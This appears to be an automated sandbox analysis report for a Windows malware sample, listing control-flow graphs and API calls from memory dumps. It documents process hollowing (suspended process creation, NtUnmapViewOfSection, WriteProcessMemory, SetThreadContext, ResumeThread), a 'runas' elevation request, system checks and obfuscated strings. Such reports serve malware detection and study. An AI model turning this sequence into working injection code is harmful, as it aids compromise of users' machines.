                                                                                                control_flow_graph 1537 cb5e90-cb6365 call cc1350 call cb2b70 call cb4dd0 call cc1800 GetFileAttributesA call cc1350 call cb2b70 call cb4dd0 call cc1800 GetFileAttributesA call cc1350 call cb2b70 call cb4dd0 call cc1800 GetFileAttributesA call cc1350 call cb2b70 call cb4dd0 call cc1800 GetFileAttributesA call cc1350 call cb2b70 call cb4dd0 call cc1800 GetFileAttributesA 1604 cb636b-cb636e 1537->1604 1605 cb6367-cb6369 1537->1605 1606 cb6371-cb6377 1604->1606 1605->1606 1607 cb6379-cb6385 1606->1607 1608 cb63a5-cb63bd 1606->1608 1611 cb639b-cb63a2 call cc2870 1607->1611 1612 cb6387-cb6395 1607->1612 1609 cb63eb-cb6403 1608->1609 1610 cb63bf-cb63cb 1608->1610 1615 cb6431-cb6433 1609->1615 1616 cb6405-cb6411 1609->1616 1613 cb63cd-cb63db 1610->1613 1614 cb63e1-cb63e8 call cc2870 1610->1614 1611->1608 1612->1611 1617 cb6c95 1612->1617 1613->1614 1613->1617 1614->1609 1624 cb6441-cb6485 call cc1350 call cb2b70 call cb4dd0 call cc1800 GetFileAttributesA 1615->1624 1625 cb6435-cb643c 1615->1625 1622 cb6413-cb6421 1616->1622 1623 cb6427-cb642e call cc2870 1616->1623 1619 cb6cbd-cb6cbf 1617->1619 1620 cb6c95 call cc6fe4 1617->1620 1620->1619 1622->1617 1622->1623 1623->1615 1642 cb648b-cb648e 1624->1642 1643 cb6487-cb6489 1624->1643 1630 cb6c60-cb6c80 call cc16c0 1625->1630 1644 cb6491-cb6497 1642->1644 1643->1644 1645 cb6499-cb64a5 1644->1645 1646 cb64c5-cb64dd 1644->1646 1649 cb64bb-cb64c2 call cc2870 1645->1649 1650 cb64a7-cb64b5 1645->1650 1647 cb650b-cb6523 1646->1647 1648 cb64df-cb64eb 1646->1648 1654 cb6551-cb6553 1647->1654 1655 cb6525-cb6531 1647->1655 1652 cb64ed-cb64fb 1648->1652 1653 cb6501-cb6508 call cc2870 1648->1653 1649->1646 1650->1649 1656 cb6c9a 1650->1656 1652->1653 1652->1656 1653->1647 1662 cb6561-cb65a5 call cc1350 call cb2b70 call cb4dd0 call cc1800 GetFileAttributesA 1654->1662 1663 cb6555-cb655c 1654->1663 1660 cb6533-cb6541 1655->1660 1661 cb6547-cb654e call cc2870 1655->1661 1656->1619 1658 cb6c9a call cc6fe4 1656->1658 1658->1619 1660->1656 1660->1661 1661->1654 1676 cb65ab-cb65ae 1662->1676 1677 cb65a7-cb65a9 1662->1677 1663->1630 1678 cb65b1-cb65b7 1676->1678 1677->1678 1679 cb65b9-cb65c5 1678->1679 1680 cb65e5-cb65fd 1678->1680 1683 cb65db-cb65e2 call cc2870 1679->1683 1684 cb65c7-cb65d5 1679->1684 1681 cb662b-cb6643 1680->1681 1682 cb65ff-cb660b 1680->1682 1689 cb6671-cb6673 1681->1689 1690 cb6645-cb6651 1681->1690 1687 cb660d-cb661b 1682->1687 1688 cb6621-cb6628 call cc2870 1682->1688 1683->1680 1684->1683 1685 cb6c9f 1684->1685 1685->1619 1693 cb6c9f call cc6fe4 1685->1693 1687->1685 1687->1688 1688->1681 1691 cb6681-cb6905 call cc1350 call cb2b70 call cb4dd0 call cc1800 GetFileAttributesA call cc1350 call cb2b70 call cb4dd0 call cc1800 GetFileAttributesA call cc1350 call cb2b70 call cb4dd0 call cc1800 GetFileAttributesA 1689->1691 1692 cb6675-cb667c 1689->1692 1696 cb6653-cb6661 1690->1696 1697 cb6667-cb666e call cc2870 1690->1697 1740 cb690b-cb690e 1691->1740 1741 cb6907-cb6909 1691->1741 1692->1630 1693->1619 1696->1685 1696->1697 1697->1689 1742 cb6911-cb6917 1740->1742 1741->1742 1743 cb6919-cb6925 1742->1743 1744 cb6945-cb695d 1742->1744 1745 cb693b-cb6942 call cc2870 1743->1745 1746 cb6927-cb6935 1743->1746 1747 cb698b-cb69a3 1744->1747 1748 cb695f-cb696b 1744->1748 1745->1744 1746->1745 1749 cb6cae call cc6fe4 1746->1749 1753 cb69d1-cb69d3 1747->1753 1754 cb69a5-cb69b1 1747->1754 1751 cb696d-cb697b 1748->1751 1752 cb6981-cb6988 call cc2870 1748->1752 1764 cb6cb3 call cc6fe4 1749->1764 1751->1749 1751->1752 1752->1747 1755 cb69e1-cb6a25 call cc1350 call cb2b70 call cb4dd0 call cc1800 GetFileAttributesA 1753->1755 1756 cb69d5-cb69dc 1753->1756 1760 cb69b3-cb69c1 1754->1760 1761 cb69c7-cb69ce call cc2870 1754->1761 1778 cb6a2b-cb6a2e 1755->1778 1779 cb6a27-cb6a29 1755->1779 1756->1630 1760->1749 1760->1761 1761->1753 1770 cb6cb8 call cc6fe4 1764->1770 1770->1619 1780 cb6a31-cb6a37 1778->1780 1779->1780 1781 cb6a39-cb6a45 1780->1781 1782 cb6a65-cb6a7d 1780->1782 1783 cb6a5b-cb6a62 call cc2870 1781->1783 1784 cb6a47-cb6a55 1781->1784 1785 cb6aab-cb6ac3 1782->1785 1786 cb6a7f-cb6a8b 1782->1786 1783->1782 1784->1764 1784->1783 1787 cb6af1-cb6af3 1785->1787 1788 cb6ac5-cb6ad1 1785->1788 1790 cb6a8d-cb6a9b 1786->1790 1791 cb6aa1-cb6aa8 call cc2870 1786->1791 1794 cb6b01-cb6b45 call cc1350 call cb2b70 call cb4dd0 call cc1800 GetFileAttributesA 1787->1794 1795 cb6af5-cb6afc 1787->1795 1792 cb6ad3-cb6ae1 1788->1792 1793 cb6ae7-cb6aee call cc2870 1788->1793 1790->1764 1790->1791 1791->1785 1792->1764 1792->1793 1793->1787 1810 cb6b4b-cb6b4e 1794->1810 1811 cb6b47-cb6b49 1794->1811 1795->1630 1812 cb6b51-cb6b57 1810->1812 1811->1812 1813 cb6b59-cb6b65 1812->1813 1814 cb6b85-cb6b9d 1812->1814 1815 cb6b7b-cb6b82 call cc2870 1813->1815 1816 cb6b67-cb6b75 1813->1816 1817 cb6bcb-cb6be3 1814->1817 1818 cb6b9f-cb6bab 1814->1818 1815->1814 1816->1770 1816->1815 1822 cb6c11-cb6c13 1817->1822 1823 cb6be5-cb6bf1 1817->1823 1820 cb6bad-cb6bbb 1818->1820 1821 cb6bc1-cb6bc8 call cc2870 1818->1821 1820->1770 1820->1821 1821->1817 1824 cb6c1e call cb4210 1822->1824 1825 cb6c15-cb6c1c 1822->1825 1828 cb6bf3-cb6c01 1823->1828 1829 cb6c07-cb6c0e call cc2870 1823->1829 1833 cb6c23-cb6c26 1824->1833 1825->1630 1828->1770 1828->1829 1829->1822 1835 cb6c59-cb6c5b 1833->1835 1836 cb6c28-cb6c30 call cb4210 1833->1836 1835->1630 1836->1835 1839 cb6c32-cb6c3a call cb4210 1836->1839 1839->1835 1842 cb6c3c-cb6c44 call cb4210 1839->1842 1842->1835 1845 cb6c46-cb6c4e call cb4210 1842->1845 1845->1835 1848 cb6c50-cb6c57 1845->1848 1848->1630
                                                                                                APIs
                                                                                                  • Part of subcall function 00CB4DD0: GetTempPathA.KERNEL32(00000104,?), ref: 00CB4DE8
                                                                                                • GetFileAttributesA.KERNELBASE(00000000), ref: 00CB5EDE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AttributesFilePathTemp
                                                                                                • String ID: FLPK$FNPsamv=$FSZw 2Io$GLDITA==$IcZBbG0n$JSZz9G0s
                                                                                                • API String ID: 3199926297-2233727051
                                                                                                • Opcode ID: 45b79dd096bd906d303f78b99bffc56182f3ecdf64958b66c8bd02f2213eff74
                                                                                                • Instruction ID: ba34e8472329765d1b28a35bec274292d668560ff15abac7425ba1cb9bcedd4b
                                                                                                • Opcode Fuzzy Hash: 45b79dd096bd906d303f78b99bffc56182f3ecdf64958b66c8bd02f2213eff74
                                                                                                • Instruction Fuzzy Hash: 7712FD70E001089BFF18EBB4D98ABEEBB729F51304F644518D812273D3D7799A85DB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1849 cb34c0-cb34ea GetModuleFileNameA 1850 cb3661-cb3677 VirtualFree 1849->1850 1851 cb34f0-cb34fb 1849->1851 1851->1850 1852 cb3501-cb353d call cc35b0 CreateProcessA 1851->1852 1852->1850 1855 cb3543-cb356b VirtualAlloc GetThreadContext 1852->1855 1855->1850 1856 cb3571-cb358d ReadProcessMemory 1855->1856 1857 cb358f-cb35ae GetModuleHandleA GetProcAddress 1856->1857 1858 cb35b1-cb35ca VirtualAllocEx 1856->1858 1857->1858 1858->1850 1859 cb35d0-cb35e6 WriteProcessMemory 1858->1859 1861 cb35e8-cb35ef 1859->1861 1862 cb3627-cb365b WriteProcessMemory SetThreadContext ResumeThread 1859->1862 1863 cb35f2-cb3622 WriteProcessMemory 1861->1863 1862->1850 1863->1863 1864 cb3624 1863->1864 1864->1862
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 00CB34DC
                                                                                                • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,00000000), ref: 00CB3535
                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004,?,?,00000000), ref: 00CB354E
                                                                                                • GetThreadContext.KERNELBASE(?,00000000,?,?,00000000), ref: 00CB3563
                                                                                                • ReadProcessMemory.KERNELBASE(?, ,?,00000004,00000000,?,?,00000000), ref: 00CB3581
                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,00000000), ref: 00CB3599
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00CB35A0
                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,?,?,00000000), ref: 00CB35BF
                                                                                                • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?,?,00000000), ref: 00CB35DA
                                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 00CB360C
                                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000,?,?,00000000,?,?,00000000), ref: 00CB363C
                                                                                                • SetThreadContext.KERNELBASE(?,00000000,?,?,00000000,?,?,00000000), ref: 00CB3652
                                                                                                • ResumeThread.KERNELBASE(?,?,?,00000000,?,?,00000000), ref: 00CB365B
                                                                                                • VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000), ref: 00CB3669
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$Memory$ThreadVirtualWrite$AllocContextModule$AddressCreateFileFreeHandleNameProcReadResume
                                                                                                • String ID: $NtUnmapViewOfSection$ntdll.dll
                                                                                                • API String ID: 4232606500-1522589568
                                                                                                • Opcode ID: 7f48af93f937722a396c37bd44b4161abe34d2f4b8235abd4b0f73aaf5fcfd30
                                                                                                • Instruction ID: 4aa36f2e826f87d522b0994316bb796f8dd00e030d03c4893d2fd3f3a67da2e9
                                                                                                • Opcode Fuzzy Hash: 7f48af93f937722a396c37bd44b4161abe34d2f4b8235abd4b0f73aaf5fcfd30
                                                                                                • Instruction Fuzzy Hash: 2F513771A40209BFEB109FA4DC85FEEBBB8BF08700F504026F615EA290D7B5AA55CB55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 3443 cb4210-cb426f call cc35b0 GetVersionExW 3446 cb427a-cb429a call cc1350 call cb2b70 3443->3446 3447 cb4271-cb4279 3443->3447 3452 cb429e-cb42bc call cc1350 call cb2b70 3446->3452 3453 cb429c 3446->3453 3458 cb42be 3452->3458 3459 cb42c0-cb42d7 GetModuleHandleA GetProcAddress 3452->3459 3453->3452 3458->3459 3460 cb42d9-cb42e5 3459->3460 3461 cb4305-cb431d 3459->3461 3464 cb42fb-cb4302 call cc2870 3460->3464 3465 cb42e7-cb42f5 3460->3465 3462 cb434b-cb4363 3461->3462 3463 cb431f-cb432b 3461->3463 3468 cb4369 GetSystemInfo 3462->3468 3469 cb4365-cb4367 GetNativeSystemInfo 3462->3469 3466 cb432d-cb433b 3463->3466 3467 cb4341-cb4348 call cc2870 3463->3467 3464->3461 3465->3464 3470 cb4700 call cc6fe4 3465->3470 3466->3467 3466->3470 3467->3462 3474 cb436f-cb4378 3468->3474 3469->3474 3479 cb4705-cb470a call cc6fe4 3470->3479 3477 cb437a-cb4381 3474->3477 3478 cb439f-cb43a2 3474->3478 3480 cb46f2-cb46ff 3477->3480 3481 cb4387-cb439e 3477->3481 3483 cb43a8-cb43b1 3478->3483 3484 cb4674-cb4677 3478->3484 3487 cb43cd-cb43d0 3483->3487 3488 cb43b3-cb43cc 3483->3488 3484->3480 3485 cb4679-cb4682 3484->3485 3489 cb46c1-cb46c4 3485->3489 3490 cb4684-cb4688 3485->3490 3491 cb43d6-cb43dd 3487->3491 3492 cb4635-cb4637 3487->3492 3497 cb46de-cb46ed 3489->3497 3498 cb46c6-cb46dd 3489->3498 3493 cb468a-cb468f 3490->3493 3494 cb46a9-cb46c0 3490->3494 3495 cb449a-cb461e call cc1350 call cb2b70 call cc1350 call cb2b70 call cb2c80 call cc1350 call cb2b70 call cb4010 call cc1350 call cb2b70 call cc1350 call cb2b70 call cb2c80 call cc1350 call cb2b70 call cb4010 call cc1350 call cb2b70 call cc1350 call cb2b70 call cb2c80 call cc1350 call cb2b70 call cb4010 3491->3495 3496 cb43e3-cb4428 call cc1350 call cb2b70 call cc1350 call cb2b70 call cb2c80 3491->3496 3499 cb4639-cb4650 3492->3499 3500 cb4651-cb4654 3492->3500 3493->3494 3501 cb4691-cb46a8 3493->3501 3536 cb4624-cb462d 3495->3536 3522 cb442d-cb4434 3496->3522 3497->3480 3500->3480 3504 cb465a-cb4673 3500->3504 3524 cb4438-cb4452 call cc6e05 3522->3524 3525 cb4436 3522->3525 3530 cb4483-cb4485 3524->3530 3531 cb4454-cb4460 3524->3531 3525->3524 3535 cb448b-cb4495 3530->3535 3530->3536 3533 cb4462-cb4470 3531->3533 3534 cb4476-cb4480 call cc2870 3531->3534 3533->3479 3533->3534 3534->3530 3535->3536 3536->3484 3540 cb462f 3536->3540 3540->3492
                                                                                                APIs
                                                                                                • GetVersionExW.KERNEL32(0000011C,?,777D6490), ref: 00CB4267
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00CB42C2
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00CB42C9
                                                                                                • GetNativeSystemInfo.KERNELBASE(?), ref: 00CB4365
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressHandleInfoModuleNativeProcSystemVersion
                                                                                                • String ID: B qALg==$B qAMQ==$B qBKg==
                                                                                                • API String ID: 2167034304-1059425217
                                                                                                • Opcode ID: 399e0e4e7e63fff39e5a85cd3f815cf90c2c6cc4dcf26f11a3abf9108637f10b
                                                                                                • Instruction ID: ff9574435f640f7af79f716aa057f43310150b5c9f50c61afde12733a422cb81
                                                                                                • Opcode Fuzzy Hash: 399e0e4e7e63fff39e5a85cd3f815cf90c2c6cc4dcf26f11a3abf9108637f10b
                                                                                                • Instruction Fuzzy Hash: C1C14431E041805BDB18BB68EC4B7EC7761EB86320F58029DEC029B393EB769E5147D2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 3574 cb3680-cb3789 call cc16c0 ShellExecuteA 3581 cb378b-cb3797 3574->3581 3582 cb37b3-cb37b7 3574->3582 3583 cb37a9-cb37b0 call cc2870 3581->3583 3584 cb3799-cb37a7 3581->3584 3583->3582 3584->3583 3585 cb37b8-cb3821 call cc6fe4 call cc1350 * 6 call cb3680 3584->3585 3604 cb3826-cb3899 3585->3604 3607 cb389b-cb38a8 3604->3607 3608 cb38c4-cb38ca 3604->3608 3609 cb38ba-cb38c1 call cc2870 3607->3609 3610 cb38aa-cb38b8 3607->3610 3609->3608 3610->3609 3611 cb38cd-cb3a01 call cc6fe4 Sleep call cc16c0 * 3 CreateThread Sleep 3610->3611 3624 cb3a2f-cb3a47 3611->3624 3625 cb3a03-cb3a0f 3611->3625 3628 cb3a49-cb3a55 3624->3628 3629 cb3a71-cb3a89 3624->3629 3626 cb3a11-cb3a1f 3625->3626 3627 cb3a25-cb3a2c call cc2870 3625->3627 3626->3627 3632 cb3ab8-cb3abf call cc6fe4 3626->3632 3627->3624 3634 cb3a67-cb3a6e call cc2870 3628->3634 3635 cb3a57-cb3a65 3628->3635 3630 cb3a8b-cb3a97 3629->3630 3631 cb3ab3-cb3ab7 3629->3631 3637 cb3aa9-cb3ab0 call cc2870 3630->3637 3638 cb3a99-cb3aa7 3630->3638 3634->3629 3635->3632 3635->3634 3637->3631 3638->3632 3638->3637
                                                                                                APIs
                                                                                                • ShellExecuteA.SHELL32(00000000,00000001,?,?,00000000,00000000), ref: 00CB36ED
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExecuteShell
                                                                                                • String ID: ASij$NSRn$runas
                                                                                                • API String ID: 587946157-833901686
                                                                                                • Opcode ID: a65524831ba39207b18ceec936638d3f421bc1758aa2e5b8012f23cfa3514d09
                                                                                                • Instruction ID: f7c94752da4fc5d30ada42f1952c4b03b4f59077b97abaea1ea64460ee24f00d
                                                                                                • Opcode Fuzzy Hash: a65524831ba39207b18ceec936638d3f421bc1758aa2e5b8012f23cfa3514d09
                                                                                                • Instruction Fuzzy Hash: 32C11470600288ABEB08EF68CC86BDE3BA6EB45344F54451CFC45872D2D775EA858BD2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 3645 ccfc87-ccfcaf call ccf8a3 call ccf901 3650 ccfe55-ccfe8a call cc7001 call ccf8a3 call ccf901 3645->3650 3651 ccfcb5-ccfcc1 call ccf8a9 3645->3651 3675 ccfe90-ccfe9c call ccf8a9 3650->3675 3676 ccffb2-cd000f call cc7001 call cd35cb 3650->3676 3651->3650 3656 ccfcc7-ccfcd2 3651->3656 3658 ccfd08-ccfd11 call cc8951 3656->3658 3659 ccfcd4-ccfcd6 3656->3659 3670 ccfd14-ccfd19 3658->3670 3662 ccfcd8-ccfcdc 3659->3662 3665 ccfcde-ccfce0 3662->3665 3666 ccfcf8-ccfcfa 3662->3666 3671 ccfcf4-ccfcf6 3665->3671 3672 ccfce2-ccfce8 3665->3672 3668 ccfcfd-ccfcff 3666->3668 3673 ccfd05 3668->3673 3674 ccfe51-ccfe54 3668->3674 3670->3670 3677 ccfd1b-ccfd3c call cc8e3a call cc8951 3670->3677 3671->3668 3672->3666 3678 ccfcea-ccfcf2 3672->3678 3673->3658 3675->3676 3685 ccfea2-ccfeae call ccf8d5 3675->3685 3695 cd0019-cd001c 3676->3695 3696 cd0011-cd0017 3676->3696 3677->3674 3693 ccfd42-ccfd45 3677->3693 3678->3662 3678->3671 3685->3676 3694 ccfeb4-ccfed5 call cc8951 GetTimeZoneInformation 3685->3694 3697 ccfd48-ccfd4d 3693->3697 3707 ccfedb-ccfefc 3694->3707 3708 ccff90-ccffb1 call ccf89d call ccf891 call ccf897 3694->3708 3699 cd005f-cd0071 3695->3699 3700 cd001e-cd002e call cc8e3a 3695->3700 3696->3699 3697->3697 3701 ccfd4f-ccfd61 call cc80ae 3697->3701 3704 cd0081 3699->3704 3705 cd0073-cd0076 3699->3705 3718 cd0038-cd0051 call cd35cb 3700->3718 3719 cd0030 3700->3719 3701->3650 3714 ccfd67-ccfd7a call cd21f7 3701->3714 3710 cd0086-cd009b call cc8951 call cc308c 3704->3710 3711 cd0081 call ccfe62 3704->3711 3705->3704 3712 cd0078-cd007f call ccfc87 3705->3712 3716 ccfefe-ccff03 3707->3716 3717 ccff06-ccff0d 3707->3717 3711->3710 3712->3710 3714->3650 3741 ccfd80-ccfd83 3714->3741 3716->3717 3728 ccff1f-ccff21 3717->3728 3729 ccff0f-ccff16 3717->3729 3738 cd0056-cd005c call cc8951 3718->3738 3739 cd0053-cd0054 3718->3739 3727 cd0031-cd0036 call cc8951 3719->3727 3749 cd005e 3727->3749 3730 ccff23-ccff4c call ccd1ac call ccc8a4 3728->3730 3729->3728 3736 ccff18-ccff1d 3729->3736 3757 ccff4e-ccff51 3730->3757 3758 ccff5a-ccff5c 3730->3758 3736->3730 3738->3749 3739->3727 3747 ccfd8b-ccfd91 3741->3747 3748 ccfd85-ccfd89 3741->3748 3753 ccfd94-ccfda1 call cc6e05 3747->3753 3754 ccfd93 3747->3754 3748->3741 3748->3747 3749->3699 3762 ccfda4-ccfda9 3753->3762 3754->3753 3757->3758 3760 ccff53-ccff58 3757->3760 3761 ccff5e-ccff7c call ccc8a4 3758->3761 3760->3761 3768 ccff7e-ccff81 3761->3768 3769 ccff8b-ccff8e 3761->3769 3764 ccfdab-ccfdb0 3762->3764 3765 ccfdb2-ccfdb3 3762->3765 3764->3765 3767 ccfdb5-ccfdb8 3764->3767 3765->3762 3770 ccfdba-ccfdd1 call cc6e05 3767->3770 3771 ccfe06-ccfe09 3767->3771 3768->3769 3772 ccff83-ccff89 3768->3772 3769->3708 3779 ccfde5-ccfde7 3770->3779 3780 ccfdd3 3770->3780 3773 ccfe0b-ccfe0d 3771->3773 3774 ccfe10-ccfe24 3771->3774 3772->3708 3773->3774 3777 ccfe3a 3774->3777 3778 ccfe26-ccfe36 call cd21f7 3774->3778 3781 ccfe3d-ccfe4f call ccf89d call ccf891 3777->3781 3778->3650 3787 ccfe38 3778->3787 3779->3771 3786 ccfde9-ccfdf9 call cc6e05 3779->3786 3784 ccfdd5-ccfdda 3780->3784 3781->3674 3784->3779 3788 ccfddc-ccfde3 3784->3788 3794 ccfe00-ccfe04 3786->3794 3787->3781 3788->3779 3788->3784 3794->3771 3795 ccfdfb-ccfdfd 3794->3795 3795->3771 3796 ccfdff 3795->3796 3796->3794
                                                                                                APIs
                                                                                                Strings
                                                                                                • W. Europe Daylight Time, xrefs: 00CCFF6A
                                                                                                • W. Europe Standard Time, xrefs: 00CCFF3B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$InformationTimeZone
                                                                                                • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                                                • API String ID: 597776487-986674615
                                                                                                • Opcode ID: b6ab44f39855ec38636e6ccbc68bbf06ca844d2f4c9f2bb06ff1a3ece3ab90af
                                                                                                • Instruction ID: ef3b27860517d8e5590d88881680a5552ebead9be0de397dd783ee5605814422
                                                                                                • Opcode Fuzzy Hash: b6ab44f39855ec38636e6ccbc68bbf06ca844d2f4c9f2bb06ff1a3ece3ab90af
                                                                                                • Instruction Fuzzy Hash: 86C11671900245AFDB219F68C881FAE7BBAEF46314F24057EE5A59B292D7308F43D750
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_00012C71,00CC2962), ref: 00CC2C6A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: 7f3e34f37107e57e1e073668cb4fb70af1e1b904284562e8fbe7cc82cfcb9f19
                                                                                                • Instruction ID: 4e8ab348a79ad359c4fdb4bde13aa9a6ed0341a376a48c3c6a217d52fdf80549
                                                                                                • Opcode Fuzzy Hash: 7f3e34f37107e57e1e073668cb4fb70af1e1b904284562e8fbe7cc82cfcb9f19
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00CB4210: GetVersionExW.KERNEL32(0000011C,?,777D6490), ref: 00CB4267
                                                                                                  • Part of subcall function 00CB4710: GetVersionExW.KERNEL32(0000011C), ref: 00CB4766
                                                                                                • IsUserAnAdmin.SHELL32 ref: 00CBFB80
                                                                                                  • Part of subcall function 00CB2B70: RegOpenKeyExA.KERNELBASE(?,00000400,00000000,00000001,?,?,777D6490), ref: 00CB2CC1
